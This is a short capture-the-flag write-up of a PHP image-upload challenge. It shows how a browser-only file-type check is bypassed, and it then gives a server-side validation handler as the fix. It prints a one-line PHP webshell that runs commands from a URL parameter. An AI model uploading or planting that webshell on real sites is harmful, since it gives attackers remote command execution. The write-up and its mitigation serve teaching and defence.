# [EN] Image Uploader 1

###### tags: `Writeup` `Web` `English`

> [name=FlyDragon]

## Step.1

http://lotuxctf.com:20008

![](https://hackmd.io/_uploads/S1vo9ZiRh.png)

It is an image uploader. Upload a `test.png`, and you will get this message.

```
Uploaded at : uploads/64fd8aff877ba_test.png
```

Visit this path to view what we uploaded. We can upload a **PHP webshell** to get the flag.

## Step.2

You can upload any file after modifying the frontend code, which restricts the file picker to images:

```html
<input type="file" name="image" accept="image/*" required="">
```

Upload a `shell.php`.

```php
<?php system($_GET["cmd"]); ?>
```

Visit the path and pass the parameter `?cmd=ls` to run `ls`. There is a `flag.txt`.
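The upload works because the image restriction exists only in the browser. As an added example (not part of the original writeup and not the challenge's code), here is a server-side handler that would block it: the type is decided from the file's bytes and the server assigns the stored name. The function name `safe_image_name` and the storage path are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Allow-list: MIME type detected from the bytes => extension the server assigns.
const ALLOWED_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

// Returns a server-generated file name for an acceptable image, or null to reject.
function safe_image_name(string $tmpPath): ?string
{
    // Decide the type from file content, not from the client's name or Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        return null;
    }
    // The file must also parse as an image.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    // The client's file name is discarded, so a ".php" extension never reaches disk.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
}

if (PHP_SAPI !== 'cli') {
    // Web request: "image" is the field name used by the upload form above.
    $file = $_FILES['image'] ?? null;
    $name = ($file !== null && $file['error'] === UPLOAD_ERR_OK)
        ? safe_image_name($file['tmp_name']) : null;
    // Assumed storage directory (hypothetical path), kept outside the web root.
    $dir = __DIR__ . '/../storage/images/';
    if ($name === null || !move_uploaded_file($file['tmp_name'], $dir . $name)) {
        http_response_code(400);
        exit('Rejected: not an allowed image');
    }
    exit('Stored as ' . $name);
}

// CLI demo with constructed sample files (not taken from the challenge).
$samples = [
    'test.gif'  => "GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    'shell.php' => '<?php echo "constructed sample"; ?>',
];
foreach ($samples as $clientName => $bytes) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    printf("%-10s => %s\n", $clientName, safe_image_name($tmp) ?? 'rejected');
    unlink($tmp);
}
```

Content checks alone do not stop a file that is both a valid image and contains script text, which is why the server-assigned extension and a storage location where the web server does not execute PHP both matter.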